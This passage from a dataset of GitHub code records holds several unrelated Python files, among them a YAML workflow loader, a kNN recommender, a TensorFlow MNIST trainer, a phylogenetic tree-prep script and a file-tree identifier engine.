edges(y_table, x_step)\r\nrng = runge_left(y_table, x_step)\r\nalign = leveling_variables(x_table, y_table)\r\nad = accurate_derivative(x_table)\r\nna = new_align(x_table, y_table)\r\n\r\n\r\nstr_ld = []\r\nstr_cd = []\r\nstr_edg = []\r\nstr_rng = []\r\nstr_al = []\r\nfor i in range(len(x_table)):\r\n    if left_diff[i] == None:\r\n        str_ld.append(\"None\" + \" \" * (20 - len(\"None\")))\r\n    else:\r\n        str_ld.append(\"{: <15.4f}\".format(left_diff[i]))\r\n\r\n    if central_diff[i] == None:\r\n        str_cd.append(\"None\" + \" \" * (20 - len(\"None\")))\r\n    else:\r\n        str_cd.append(\"{: <15.4f}\".format(central_diff[i]))\r\n\r\n    if edg[i] == None:\r\n        str_edg.append(\"None\" + \" \" * (20 - len(\"None\")))\r\n    else:\r\n        str_edg.append(\"{: <15.4f}\".format(edg[i]))\r\n\r\n    if rng[i] == None:\r\n        str_rng.append(\"None\" + \" \" * (20 - len(\"None\")))\r\n    else:\r\n        str_rng.append(\"{: <15.4f}\".format(rng[i]))\r\n\r\n\r\nprint(\"x \" + \" \" * (20 - len(\"x\")),\r\n      \"y \" + \" \" * (20 - len(\"y\")),\r\n      \"left diff \" + \" \" * (20 - len(\"left diff\")),\r\n      \"central diff \" + \" \" * (20 - len(\"central diff\")),\r\n      \"edges \" + \" \" * (20 - len(\"edges\")),\r\n      \"Runge \" + \" \" * (20 - len(\"Runge\")),\r\n      \"align\" + \" \" * (20 - len(\"Runge\")),\r\n      \"accurate\" + \" \" * (20 - len(\"Runge\")),\r\n      \"new_align\")\r\n\r\nfor i in range(len(x_table)):\r\n    print(\"{: <15.4f}\".format(x_table[i]), \" \" * (20 - len(\"{: <15.4f}\".format(x_table[i]))),\r\n          \"{: <15.4f}\".format(y_table[i]), \" \" * (20 - len(\"{: <15.4f}\".format(y_table[i]))),\r\n          str_ld[i], \" \" * (20 - len(str_ld[i])),\r\n          str_cd[i], \" \" * (20 - len(str_cd[i])),\r\n          str_edg[i], \" \" * (20 - len(str_edg[i])),\r\n          str_rng[i], \" \" * (20 - len(str_rng[i])),\r\n          \"{: <15.4f}\".format(align[i]), \" \" * (20 - len(\"{: <15.4f}\".format(align[i]))),\r\n          \"{: <15.4f}\".format(ad[i]), \" \" * (20 - len(\"{: <15.4f}\".format(ad[i]))),\r\n          \"{: <15.4f}\".format(na[i]))\r\n\r\n\r\n\r\n\r\n","repo_name":"Painted-Black/BMSTU-ComputationalAlgorithms","sub_path":"lab6_ca/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"26653240194","text":"from builtins import object\nimport copy\nimport os\nimport re\nimport string\nimport yaml\nfrom ..core import tasks\nfrom ..core.engine.task_graph import TaskGraph\nfrom ..core import utils\n\nclass LoaderException(Exception):\n    \"\"\" Exception for generic Task errors\n    \"\"\"\n    pass\n\nclass Loader(object):\n    \"\"\" Responsible for loading the configuration files and \n        creating a task graph from a given workflow_name \n        present inside the config file.\n\n        Note: Duplicate entries found in more than 1 config file are overwritten by config files found later in the list\n\n        Args:\n            config_file_paths (list): List of file paths to parse for the configured \n                work_flows. 
If not specified, it defaults to the \"WOLFKROW_CONFIG_SEARCH_PATHS\" \n                environment variable.\n    \"\"\"\n    def __init__(self, config_file_paths=None, replacements=None, sgtk=None, temp_dir=None):\n        if config_file_paths is None:\n            config_file_paths = os.environ.get('WOLFKROW_CONFIG_SEARCH_PATHS')\n            config_file_paths = os.path.expandvars(config_file_paths)\n            if config_file_paths:\n                config_file_paths = config_file_paths.split(\",\")\n\n        if config_file_paths is None:\n            raise LoaderException(\"Configuration file not specified and 'WOLFKROW_CONFIG_SEARCH_PATHS' not set.\")\n\n        self._config_file_paths = config_file_paths\n        self.__config = None\n        self.replacements = replacements or {}\n        self._sgtk = sgtk\n        self.temp_dir = temp_dir\n\n        # Ensure that the replacements dictionary is an instance of ReplacementsDict\n        if not isinstance(self.replacements, utils.ReplacementsDict):\n            self.replacements = utils.ReplacementsDict(self.replacements)\n\n    @property\n    def config(self):\n        if self.__config is None:\n            self.__config = self._load_configs(self._config_file_paths)\n        \n        return self.__config\n\n    def _update_config(self, current_dict, new_dict):\n        \n        # # Generic solution:\n        # for key, value in new_dict.items():\n        #     if key in current_dict:\n        #         if type(value) != type(current_dict[key]):\n        #             current_dict[key] = value\n        #         elif isinstance(dict, value):\n        #             self._update_config(current_dict[key], value)\n        #         elif isinstance(list, value) or isinstance(set, value):\n        #             for item in value:\n        #                 pass\n\n        # Custom solution:\n        # Top level of the config. i.e.: task_attribute_defaults, replacements, tasks\n        workflow_dict = new_dict.get(\"workflows\")\n        if workflow_dict:\n            if \"workflows\" not in current_dict:\n                current_dict[\"workflows\"] = workflow_dict\n            else:\n                current_dict[\"workflows\"].update(workflow_dict)\n\n        tasks_dict = new_dict.get(\"tasks\")\n        if tasks_dict:\n            if \"tasks\" not in current_dict:\n                current_dict[\"tasks\"] = tasks_dict\n            else:\n                current_dict[\"tasks\"].update(tasks_dict)\n\n        replacements_dict = new_dict.get(\"replacements\")\n        if replacements_dict:\n            if \"replacements\" not in current_dict:\n                current_dict[\"replacements\"] = replacements_dict\n            else:\n                current_dict[\"replacements\"].update(replacements_dict)\n\n        task_attribute_defaults = new_dict.get(\"task_attribute_defaults\")\n        if task_attribute_defaults:\n            if \"task_attribute_defaults\" not in current_dict:\n                current_dict[\"task_attribute_defaults\"] = task_attribute_defaults\n            else:\n                current_dict[\"task_attribute_defaults\"].update(task_attribute_defaults)\n\n        executables = new_dict.get(\"executables\")\n        if executables:\n            if \"executables\" not in current_dict:\n                current_dict[\"executables\"] = executables\n            else:\n                current_dict[\"executables\"].update(executables)\n\n    def _load_configs(self, config_file_paths):\n        config = {}\n        for config_file in config_file_paths:\n\n            # Check that the config file exists before loading it.\n            if not os.path.exists(config_file):\n                print(\"Warning: Wolfkrow config file {} was not found.\".format(config_file))\n                continue\n\n            with open(config_file, \"r\") as handle:\n                file_contents = handle.read()\n\n            config_snippet = yaml.load(file_contents, Loader=yaml.Loader)\n            self._update_config(config, config_snippet)\n\n        # replace replacements\n        # TODO: Should configured replacements overwrite replacements that are passed \n        # into the tool, or vice versa?\n        self.replacements.update(config.get('replacements', {}))\n\n        return config\n\n    def tasks_from_task_names_list(self, task_names):\n        \"\"\" Parses a list of task names to find 
def tasks_from_task_names_list(self, task_names):\n        \"\"\" Parses a list of task names, finds them in the configuration files, then \n            constructs the corresponding list of tasks.\n\n            Note: Task names not found in the configuration file will be ignored.\n\n            Args: \n                task_names (list): List containing the names of tasks to look up \n                    in the configuration file.\n            Returns:\n                List: List of constructed tasks.\n        \"\"\"\n\n        tasks_lookup = self.config['tasks']\n\n        tasks_list = []\n        for task_name in task_names:\n\n            configured_task_data = tasks_lookup.get(task_name)\n            if configured_task_data is None:\n                continue\n\n            default_task_data = self.get_default_task_data(configured_task_data['task_type'])\n            task_data = copy.deepcopy(default_task_data)\n            task_data.update(configured_task_data)\n\n            task_type = task_data['task_type']\n            task_obj = tasks.all_tasks.get(task_type)\n            if task_obj is None:\n                print(\"Warning: Task type '{task_type}' is undefined. Ignoring...\".format(task_type=task_type))\n                # Bug fix: skip unknown task types instead of calling from_dict on None\n                # (mirrors the behaviour of parse_workflow below).\n                continue\n\n            task_data['name'] = task_name\n            task_data['config'] = self.config\n            task = task_obj.from_dict(\n                task_data, \n                replacements=self.replacements, \n                config_files=self._config_file_paths, \n                temp_dir=self.temp_dir,\n                sgtk=self._sgtk\n            )\n            tasks_list.append(task)\n\n        return tasks_list\n\n    
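# Illustrative usage (added; replacement keys and task names are hypothetical):\n    #   loader = Loader(replacements={\"shot\": \"sh010\"})\n    #   tasks = loader.tasks_from_task_names_list([\"render\", \"publish\"])\n    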
def get_default_task_data(self, task_name):\n        if task_name in self.config.get('task_attribute_defaults', []):\n            return self.config['task_attribute_defaults'][task_name]\n        return {}\n\n    def parse_workflow(self, workflow_name):\n\n        task_graph = TaskGraph(\n            workflow_name, \n            replacements=self.replacements, \n            temp_dir=self.temp_dir,\n        )\n        workflow_tasks = self.config['workflows'].get(workflow_name)\n\n        if workflow_tasks is None:\n            raise Exception(\"Unable to find workflow '{}'\".format(workflow_name))\n\n        for task_name in workflow_tasks:\n\n            # Get default task data dictionary\n            configured_task_data = self.config['tasks'].get(task_name)\n            if not configured_task_data:\n                print(\"Warning: Task '{task_name}' is undefined. Ignoring...\".format(task_name=task_name))\n                continue\n\n            default_task_data = self.get_default_task_data(configured_task_data['task_type'])\n            task_data = copy.deepcopy(default_task_data)\n            task_data.update(configured_task_data)\n\n            task_type = configured_task_data['task_type']\n            task_obj = tasks.all_tasks.get(task_type)\n            if task_obj is None:\n                print(\"Warning: Task type '{task_type}' is undefined. Ignoring...\".format(task_type=task_type))\n                continue\n\n            task_data['name'] = task_name\n            task_data['config'] = self.config\n            task = task_obj.from_dict(\n                task_data, \n                replacements=self.replacements, \n                config_files=self._config_file_paths, \n                temp_dir=self.temp_dir,\n                sgtk=self._sgtk\n            )\n            task_graph.add_task(task)\n\n        return task_graph\n","repo_name":"JakeClark1129/Wolfkrow","sub_path":"src/wolfkrow/builder/workflow_builder.py","file_name":"workflow_builder.py","file_ext":"py","file_size_in_byte":8302,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"24008765680","text":"\"\"\"\nhttps://programmers.co.kr/learn/courses/30/lessons/86051\n\nFind the sum of missing numbers.\n\"\"\"\n\ndef solution(numbers):\n    a = list(range(0, 10))\n    for x in numbers:\n        if x in a:\n            a.remove(x)\n    return sum(a)\n","repo_name":"dhwangdev/Algorithm","sub_path":"Programmers/Level1/SumMissingNum.py","file_name":"SumMissingNum.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29007159729","text":"from __future__ import print_function\r\n\r\nimport numpy as np\r\n\r\nfrom sklearn.neighbors import NearestNeighbors\r\n\r\n# For reproducibility\r\nnp.random.seed(1000)\r\n\r\nnb_users = 1000\r\nnb_product = 20\r\n\r\nif __name__ == '__main__':\r\n    # Create the user dataset\r\n    users = np.zeros(shape=(nb_users, 4))\r\n\r\n    for i in range(nb_users):\r\n        users[i, 0] = np.random.randint(0, 4)\r\n        users[i, 1] = np.random.randint(0, 2)\r\n        users[i, 2] = np.random.randint(0, 5)\r\n        users[i, 3] = np.random.randint(0, 5)  # fixed: was a duplicated assignment to users[i, 2]\r\n\r\n    # Create user-product dataset\r\n    user_products = np.random.randint(0, nb_product, size=(nb_users, 5))\r\n\r\n    # Fit k-nearest neighbors\r\n    nn = NearestNeighbors(n_neighbors=20, radius=2.0)\r\n    nn.fit(users)\r\n\r\n    # Create a test user\r\n    test_user = np.array([2, 0, 3, 2])\r\n\r\n    # Determine the neighbors\r\n    d, neighbors = nn.kneighbors(test_user.reshape(1, -1))\r\n\r\n    print('Neighbors:')\r\n    print(neighbors)\r\n\r\n    # Determine the suggested products\r\n    suggested_products = []\r\n\r\n    for n in neighbors:\r\n        for products in user_products[n]:\r\n            for product in products:\r\n                if product != 0 and product not in suggested_products:\r\n                    suggested_products.append(product)\r\n\r\n    print('Suggested products:')\r\n    print(suggested_products)\r\n\r\n\r\n\r\n","repo_name":"PacktPublishing/Machine-Learning-Algorithms","sub_path":"Chapter11/1user_based.py","file_name":"1user_based.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"76"} +{"seq_id":"4012446236","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\ninput_node=784 #输入层结点数\noutput_node=10 #输出层结点数\n\nhidden_node=500 #该网络只有一个隐藏层,结点数是500\n\nbatch_size=100 #批量梯度下降的批量尺寸\n\nlearning_rate_base=0.8 #初始化的学习率\nlearning_rate_decay=0.99 #学习率的衰减率\n\nregularization_lambda=0.0001 #正则化系数\ntraining_step=30000 #训练迭代次数\nmoving_average_rate=0.99 #滑动平均衰减率\n\n\n#avg_class:滑动平均类别\ndef inference(input_tensor,avg_class,weights1,biases1,weights2,biases2):\n    if avg_class==None:\n        layer1=tf.nn.relu(tf.matmul(input_tensor,weights1)+biases1)\n        return tf.matmul(layer1,weights2)+biases2 #返回神经网络输出\n    else: #使用滑动平均中的参数\n        layer1=tf.nn.relu(tf.matmul(input_tensor,avg_class.average(weights1))\n                          +avg_class.average(biases1))\n        return 
tf.matmul(layer1,avg_class.average(weights2))+avg_class.average(biases2)\n\n\n\ndef train(mnist):\n x=tf.placeholder(tf.float32,[None,input_node],name=\"x_input\")\n y_=tf.placeholder(tf.float16,[None,output_node],name=\"y_input\")\n\n\n weights1=tf.Variable(\n #这是一个截断的产生正太分布的函数,就是说产生正太分布的值如果与均值的差值大于两倍的标准差,那就重新生成\n tf.truncated_normal([input_node,hidden_node],stddev=0.1))\n biases1=tf.Variable(tf.constant(0.1,shape=[1,hidden_node]))\n\n weights2 = tf.Variable(\n # 这是一个截断的产生正太分布的函数,就是说产生正太分布的值如果与均值的差值大于两倍的标准差,那就重新生成\n tf.truncated_normal([hidden_node,output_node], stddev=0.1))\n biases2 = tf.Variable(tf.constant(0.1, shape=[1,output_node ]))\n\n #这里的是不用平均滑动模型\n y=inference(x,None,weights1,biases1,weights2,biases2)\n\n\n #训练轮数,这是不断变化的,但不是要训练的参数\n global_step=tf.Variable(0,trainable=False)\n variable_average=tf.train.ExponentialMovingAverage(moving_average_rate,global_step )\n\n #将所有可训练的参数添加进滑动平均模型(注意:tf.Variable()中默认trainable=True,默认都是可训练的)\n variable_average_op=variable_average.apply(tf.trainable_variables())\n\n #使用平均滑动模型\n average_y=inference(x,variable_average,weights1,biases1,weights2,biases2)\n\n #对预测输出y_每行求最大值,y是[m,output_node],y_-[m,output_node],arg_max行求和后,变成[m,]\n #必须显示地对参数进行赋值,logits=需要softmax的值,labels=是原样本的标签\n #返回变量尺寸为(m,)\n cross_entropy=tf.nn.sparse_softmax_cross_entropy_with_logits(logits=y,labels=tf.arg_max(y_,1))\n cross_entropy_mean=tf.reduce_mean((cross_entropy)) #交叉熵求平均值\n\n\n regularizer=tf.contrib.layers.l2_regularizer(regularization_lambda) #定义正则化\n regularization=regularizer(weights1)+regularizer(weights2) #正则化只需要对选中参数进行正则化,无需对偏置记性呢正则化\n\n loss=cross_entropy_mean+regularization #交叉熵平均值和正则化都是单一的数值型,直接相加\n\n\n #learning_rate=learning_rate_base*learning_rate_decay^(global_step/decay_step),其中\n #decay_step是第三个参数,即mnist.train.num_examples/batch_size\n #还有个参数decay_step表示每decay_step步更新衰减一次学习率\n #global_step是当前的迭代轮数,不断变化的\n learning_rate=tf.train.exponential_decay(\n learning_rate_base, #基础的学习率\n global_step,\n mnist.train.num_examples/batch_size, #decay_step,更新速度,即每优化这么多次更新一次学习率(这个参数是不定的)\n learning_rate_decay,\n )\n\n #这里一定要加上global_step=global_step,保证变量global_step不断变化,然后进一步传进exponential_decay函数中\n #之前GradientDescentOptimizer中的学习率参数都是固定的,像0.01之类,这里则传入了变量,保证学习率不断变化\n #global_step自增,在staircase=True时,每到global_step%decay_step==0时更新一次学习率\n train_step=tf.train.GradientDescentOptimizer(learning_rate).minimize(loss,global_step=global_step)\n\n\n #同时完成反向传播的参数训练模型,得到新的参数,这是又要滑动平均模型,利用新参数值和旧值更新每一个参数的滑动平均值\n #这里使用control_dependencies函数保证一次完成多个操作,其和train_op=tf.group(train_step,variable_average_op)是等价的\n #注意到这里的两个步骤都需要用到global_step,在train_step中保证global_step\n with tf.control_dependencies([train_step,variable_average_op]):\n train_op=tf.no_op(name=\"train\") #tf.no_op啥也不做,纯属凑数\n\n\n #tf.argmax(average_y,1)求每个样本的预测值(尺寸为:[batch_size,1]),这里返回True,False矩阵\n correct_prediction=tf.equal(tf.argmax(average_y,1),tf.argmax(y_,1))\n\n accury=tf.reduce_mean(tf.cast(correct_prediction,tf.float32)) #tf.cast将bool型矩阵转化为float型\n\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n validate_feed={x:mnist.validation.images,\n y_:mnist.validation.labels} #验证集\n\n test_feed = {x: mnist.test.images,\n y_: mnist.test.labels} #测试集\n\n\n for i in range(training_step):\n if i %1000==0: #每1000步打印一次结果\n #验证集的数据不多,可以在整个验证集上进行验证\n validate_accu=sess.run(accury,feed_dict=validate_feed)\n print(\"在%d轮迭代后,验证集的精确度为%g\"%(i,validate_accu)) #%g:根据值的大小采用%e或%f,但最多保留6位有效数字\n\n xs,ys=mnist.train.next_batch(batch_size)\n sess.run(train_op,feed_dict={x:xs,y_:ys})\n\n #全部训练完后,在测试集上看下模型精确度\n 
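# (added note) after the training loop finishes, accuracy is measured once on the held-out test set\n        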
test_accu=sess.run(accury,feed_dict=test_feed)\n        print(\"在%d轮迭代后,测试集的精确度为%g\" % (training_step, test_accu))\n\n\ndef main(argv=None):\n    mnist=input_data.read_data_sets(\"MNIST_data\",one_hot=True)\n    train(mnist)\n\n\n#tensorflow提供一个主程序入口,tf.app.run()会调用上面定义的main()函数\nif __name__==\"__main__\":\n    tf.app.run()\n\n\n","repo_name":"qzq2514/tensorFlow_selfStudy","sub_path":"fromBooks/5.2.1整合第四章优化方法后的完整神经网络模型.py","file_name":"5.2.1整合第四章优化方法后的完整神经网络模型.py","file_ext":"py","file_size_in_byte":6548,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42635681511","text":"import dendropy\nimport re\nimport os\nimport argparse\nimport sys\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"tree_fp\", help=\"file path to the tree that is to be modified\")\nparser.add_argument(\"-nbs\", help=\"Pass to indicate that the tree doesn't contain bootstraps\", action=\"store_true\")\nparser.add_argument(\"-up_bi\", help=\"Pass to indicate you wish to update bipartitions\", action=\"store_true\")\nparser.add_argument(\"-mid\", help=\"Pass to indicate you wish to midpoint root. Warning: using this option will consume large amounts of RAM and time! For 60,000 tips it can consume > 250 Gb of ram and run for days.\", action=\"store_true\")\nargs = parser.parse_args()\nparser.set_defaults(nbs=False)\nparser.set_defaults(up_bi=False)\nparser.set_defaults(mid=False)\nwd = os.getcwd()\nup_bi = args.up_bi\nnbs = args.nbs\nmid = args.mid\n\n####\n#Prep Tree\n####\n\ntree_fp = args.tree_fp\ntree_type = \"newick\"\n\n#might want to save bootstraps for later\n#this labels tips as tip taxon (i.e., OTU or species name)\n\ndef PrepTree(tree_fp, tree_type, bs=nbs):\n\t#tree_fp: file path to tree\n\t#tree_type: type of tree to be processed (only newick type is currently supported)\n\t#bs: Boolean, does the tree contain bootstrap values\n\t\n\t#import tree object\n\ttree1 = dendropy.Tree.get_from_path(\"{0}\".format(tree_fp), schema=\"{0}\".format(tree_type))\n\t\n\t#make node bootstrap dictionary \n\tbootstraps = {}\n\tbootstraps['root'] = 0.0\n\tif mid==True:\n\t\tif up_bi==True:\n\t\t\t#print(\"up_bi=T\")\n\t\t\ttree1.reroot_at_midpoint(update_bipartitions=True)\n\t\telse:\n\t\t\t#print(\"up_bi=F\")\n\t\t\ttree1.reroot_at_midpoint(update_bipartitions=False)\n\t\n\tk = 1\n\tif bs==True:\n\t\t#name nodes\n\t\tnode_it = tree1.preorder_node_iter()\n\t\tfor i in node_it:\n\t\t\tif i.label == None:\n\t\t\t\tif hasattr(i, 'taxon') and i.taxon != None: # (i.e., a tip)\n\t\t\t\t\ti.label = i.taxon.label\n\t\t\t\telse:\n\t\t\t\t\tif hasattr(i, '_parent_node') and i._parent_node != None: #new\n\t\t\t\t\t\tj = str(k)\n\t\t\t\t\t\tmlabel = \"{0}{1}\".format(\"node\", j)\n\t\t\t\t\t\t#print(mlabel)\n\t\t\t\t\t\tbootstraps[mlabel] = i.label\n\t\t\t\t\t\ti.label = mlabel\n\t\t\t\t\t\t#i.label = \"{0}{1}\".format(\"node\", j) \n\t\t\t\t\t\tk = k + 1\n\t\t\t\t\telse:\n\t\t\t\t\t\ti.label = \"root\"\n\telse:\n\t\t#name nodes\n\t\tnode_it = tree1.preorder_node_iter()\n\t\tfor i in node_it:\n\t\t\tif i.label != None:\n\t\t\t\tif hasattr(i, 'taxon') and i.taxon != None: # (i.e., a tip)\n\t\t\t\t\ti.label = i.taxon.label\n\t\t\t\telse:\n\t\t\t\t\tif hasattr(i, '_parent_node') and i._parent_node != None: #new\n\t\t\t\t\t\tj = str(k)\n\t\t\t\t\t\tmlabel = \"{0}{1}\".format(\"node\", j)\n\t\t\t\t\t\tbootstraps[mlabel] = i.label\n\t\t\t\t\t\ti.label = mlabel\n\t\t\t\t\t\t#i.label = \"{0}{1}\".format(\"node\", j) \n\t\t\t\t\t\tk = k + 1\n\t\t\t\t\telse:\n\t\t\t\t\t\ti.label = \"root\"\n\t\t\telse:\n\t\t\t\tif hasattr(i, 'taxon') and i.taxon != None: # (i.e., a tip)\n\t\t\t\t\ti.label = i.taxon.label\n\t\t\t\telse:\n\t\t\t\t\tif hasattr(i, '_parent_node') and i._parent_node != None: #new\n\t\t\t\t\t\tj = str(k)\n\t\t\t\t\t\tmlabel = \"{0}{1}\".format(\"node\", j)\n\t\t\t\t\t\tbootstraps[mlabel] = i.label\n\t\t\t\t\t\ti.label = mlabel\n\t\t\t\t\t\t#i.label = \"{0}{1}\".format(\"node\", j) \n\t\t\t\t\t\tk = k + 1\n\t\t\t\t\telse:\n\t\t\t\t\t\ti.label = \"root\"\n\t#print(bootstraps)\n\t
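# Added note: persist the node-label -> original-bootstrap mapping so support\n\t# values can be re-attached to the renamed nodes downstream.\n\t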
f = open(\"bootstraps_prep_tree.txt\", 'w')\n\tfor key, value in bootstraps.items():  # .items() works on Python 2 and 3; iteritems() is Python-2-only\n\t\tf.write('%s\\t%s\\n' % (key, value))\n\tf.close()\n\treturn tree1\n\n#def PrepTree(tree_fp, tree_type):\n#\t#import tree object\n#\ttree1 = dendropy.Tree.get_from_path(\"{0}\".format(tree_fp), schema=\"{0}\".format(tree_type))\n#\t\n#\t#name nodes\n#\tnode_it = tree1.preorder_node_iter()\n#\tk = 1\n#\tfor i in node_it:\n#\t\tif i.label == None:\n#\t\t\tif hasattr(i, 'taxon') and i.taxon != None: # (i.e., a tip)\n#\t\t\t\ti.label = i.taxon.label\n#\t\t\telse:\n#\t\t\t\tif hasattr(i, '_parent_node') and i._parent_node != None: #new\n#\t\t\t\t\tj = str(k)\n#\t\t\t\t\ti.label = \"{0}{1}\".format(\"node\", j) \n#\t\t\t\t\tk = k + 1\n#\t\t\t\telse:\n#\t\t\t\t\ti.label = \"root\"\n#\treturn tree1\n\n\n\n####\n#Make node ancestor lookup table\n####\n\ndef AncestorLookup(tree):\n\t\"This function makes a dictionary of the ancestors of each node\"\n\tnode_it = tree.preorder_node_iter()\t\n\ttip_ancestors = {}\n\t#make an iterator for each node and append each ancestor to a list(vals)\n\tfor node in node_it:\n\t\tancest_it = node.ancestor_iter(inclusive=False) #get iter for all ancestors\t\n\t\tvals = []\n\t\tfor ancestor in ancest_it: \t\t \n\t\t\tvals.append(str(ancestor.label))\n\t\ttip_ancestors[str(node.label)] = vals\n\treturn tip_ancestors\n\n\n\ntree1 = PrepTree(tree_fp, tree_type) \t\n\nancestor_lookup_dict = AncestorLookup(tree1)\n\ntree1.write_to_path(\n    'new_prepped_tree.tre',\n    'newick')\n\n\n","repo_name":"chrisgaulke/Claatu","sub_path":"bin/prep_tree.py","file_name":"prep_tree.py","file_ext":"py","file_size_in_byte":4397,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"70697300727","text":"#!/usr/bin/env python\nimport re\nimport os\n\n\ndef main():\n    path = os.path.join(os.path.dirname(__file__), \"datamodel.py\")\n\n    with open(path, \"r\") as f:\n        code = f.read()\n\n    enum_pattern = re.compile(r\"\\s+[a-zA-Z0-9_-]+\\s=\\s'[a-zA-Z0-9_-]+'\")\n\n    new_code = list()\n    in_enum = False\n    for line in code.split(\"\\n\"):\n        # Fix bad artifacts from the generation\n        if \"_code__owner_\" in line or \"_write_\" in line or \"_read_\" in line:\n            line = f'    \"\"\" {line.strip()} \"\"\"'\n\n        # Make Enums uppercase\n        elif \"(Enum):\" in line:\n            in_enum = True\n        elif in_enum:\n            if not line or line.isspace():\n                in_enum = False\n            elif enum_pattern.search(line):\n                line = line.upper()\n\n        new_code.append(line)\n    new_code = \"\\n\".join(new_code)\n    if not new_code.endswith(\"\\n\"):\n        new_code = f\"{new_code}\\n\"\n\n    with open(path, \"w\") as f:\n        f.write(new_code)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"OnScale/OnScale-Cloud-Client","sub_path":"scripts/tidy.py","file_name":"tidy.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1993286583","text":"from __future__ import annotations\n\nimport logging\nimport re\nfrom 
pathlib import Path\n\nfrom file_tree import FileTree\n\nfrom .smartPath import SmartPath\n\n\nclass IdentifierEngine:\n    \"\"\"Class that can extract an \"identifier\" from a path.\n\n    The identifier is a name that is used for comparison between directories and\n    should not contain any part that is unique (like a subject number).\n    The regular expressions in the config files are relied on\n    to remove these unique parts of the file/directory name.\n\n    Example:\n\n        \"sub-15464521_image.png\" and \"sub-25484441_image.png\"\n        would both have the same identifier \"_image.png\"\n        if using a regular expression that is keeping everything\n        after the first \"_\" like \"/_.*$/\".\n\n    Attributes\n    ----------\n    file_expression: string\n        The regular expression to filter the identifier from the name of files.\n\n    directory_expression: string\n        The regular expression to filter the identifier from the name of directories.\n\n    logger: logging.Logger\n        Logger to save info and debug messages.\n        Will send the log lines to the appropriate outputs following\n        the logger configuration in main.py.\n    \"\"\"\n\n    def __init__(self, file_expression: str, directory_expression: str, check_file: bool):\n        self.file_expression = file_expression\n        self.directory_expression = directory_expression\n        self.logger = logging.getLogger(f\"file_tree_check.{__name__}\")\n        self.logger.info(\"Created an instance of IdentifierEngine\")\n        self.check_file = check_file\n\n    def get_identifier(\n        self, path: str | Path, parent: SmartPath | None, file_tree: FileTree | None\n    ) -> str:\n        if file_tree is None:\n            return self.get_identifier_base(path)\n        else:\n            return self.get_identifier_tree(path, parent, file_tree)\n\n    def get_identifier_base(\n        self, path: str | Path, prefix_file_with_parent_directory: bool = False\n    ) -> str:\n        \"\"\"Extract the identifier from the file/directory.\n\n        The identifier should be the repeating part of the name that ties it\n        to its type for comparison\n\n            \"sept_6_weekly_report.txt\" -> \"_weekly_report.txt\"\n\n        However the details of what precisely to extract and treat as an identifier are handled\n        by the regular expressions given on creating the class instance.\n        Since the regular expression is used with ``re.search()``, only the first match is kept.\n\n        If no match is found, the entire file/directory name is used instead\n        since we prefer to have identifiers\n        that are unique but can still be used in the output vs an empty identifier.\n\n        Extraction method with the default regular expression:\n\n        .. code-block::\n\n            Files = \"_.*$\" ; Keep everything after the first \"_\" to remove the subject number.\n            Directories = \"^.*-\" ; Keep everything until the first \"-\".\n\n            ; This way, subject directories like \"sub-012012\" are all aggregated\n            ; under \"sub-\" while directory names without \"-\" are kept entirely.\n\n        Parameters\n        ----------\n        path: pathlib.Path or string\n            The path to the file/directory for which to extract the identifier.\n\n        prefix_file_with_parent_directory: bool, default = False\n            Whether to include the parent directory as a prefix to the file's identifier.\n            This is used to discriminate files that have the same name\n            but are located under different subdirectories\n            when filenames are expected to be found at multiple places\n            for each subject/configuration.\n\n        Returns\n        -------\n        identifier: string\n            The path's extracted identifier.\n            Will be used to aggregate data on files/directories\n            with the same identifier across the repeating file structure.\n        \"\"\"\n        path = Path(path)\n        if prefix_file_with_parent_directory and path.is_file():\n            # Bug fix: call get_identifier_base() here; get_identifier() requires\n            # parent and file_tree arguments and would raise a TypeError.\n            identifier = f\"{self.get_identifier_base(path.parent)}/\"\n        else:\n            identifier = \"\"\n\n        if path.is_file():\n            match = re.search(self.file_expression, path.name)\n        elif path.is_dir():\n            match = re.search(self.directory_expression, path.name)\n        elif not self.check_file:\n            match = re.search(self.file_expression, path.name)\n        else:\n            raise TypeError(f\"Path is not a file nor a directory: {path}\")\n\n        # When the entire name is filtered out, we prefer using an identifier\n        # that is maybe too unique over an empty one\n        identifier += path.name if match is None else match.group(0)\n        return identifier\n\n    def get_identifier_tree(\n        self, path: str | Path, parent: SmartPath | None, tree: FileTree\n    ) -> str:\n        if parent is not None:\n            parent_identifier = parent.identifier\n            parent_template = tree.get_template(parent_identifier)\n            templates = parent_template.children(tree._templates)\n\n        else:\n            templates = tree._templates\n        for template in templates:\n            if template == \"\":\n                continue\n            regex = self.parse_string_to_regex(template.unique_part)\n            match = re.match(regex, path.name)\n            if match is not None and match[0] != \"\":\n                return template\n        return path.name\n\n    def get_identifier_tree_old(self, path: str | Path, tree: FileTree):\n        for key in tree.template_keys():\n            if key == \"\":\n                continue\n            template = tree.get_template(key)\n            regex = self.parse_string_to_regex(template.unique_part)\n            match = re.match(regex, path.name)\n            if match is not None and match[0] != \"\":\n                return key\n        return path.name\n\n    def parse_string_to_regex(self, string):\n        string = re.sub(r\"\\{.*?\\}\", \".+\", string)\n        string = re.sub(r\"\\[(.*?)\\]\", r\"(?:\\1)?\", string)\n        return string\n\n    
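# Illustrative examples (added; the template strings are hypothetical):\n    #   parse_string_to_regex(\"sub-{subject}\")   -> \"sub-.+\"\n    #   parse_string_to_regex(\"T1w[_acq-{acq}]\") -> \"T1w(?:_acq-.+)?\"\n    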
